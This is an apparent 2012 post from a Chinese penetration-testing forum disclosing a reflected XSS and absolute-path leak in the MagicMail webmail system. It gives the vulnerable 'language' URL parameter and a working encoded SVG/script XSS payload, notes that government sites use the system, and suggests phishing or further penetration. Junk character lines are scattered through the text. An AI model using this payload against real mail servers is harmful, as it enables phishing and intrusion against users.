中国网络渗透测试联盟
标题:
MagicMail迈捷邮件系统XSS及绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-9 20:38
标题:
MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
4 r4 Q7 g& }: z8 j1 s2 w; O
1 ^# g5 o" f. p4 I; } y! b
0 i" x* e& R1 a- y
包含 一个反射性XSS 以及 绝对路径泄漏
2 Z. `% {7 b3 C" M, r" Z
看了看 貌似全部是linux的。
" f' S, C( h" _" _3 ~
8 v: X6 w$ k# y7 q: t
关键字:迈捷邮件系统 by MagicMail
9 t( V G) C6 N
; P% e+ W4 v% J( N0 u
可以看到很多政府网站都用这个邮件系统
% j7 K/ a4 ^/ T0 R8 v; m- m+ q+ f
0 p. ^, O8 P) R- W, Y% U6 M/ }
绝对路径
http://madman.in/index.php?login_type=declare&language=
# _* Y6 z$ g6 h3 F. ~" I0 z
$ m# r y2 O$ i$ K' x
5 L& ?* A- E2 N
- r$ ~" w2 i( [: W- {
XSS:
http://madman.in/index.php?login_type=declare&language=
–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
, R+ u6 N# c) |4 n
# l1 ]3 s" k% n) j
) k; J6 V! q! w: J5 O
, @7 T7 q6 H3 m
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
$ M; K: ^! _. N( D0 d; p
& V# C' Y& C. k. W
修复方案:看官方补丁吧。
" ~9 I4 g# @( P H
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2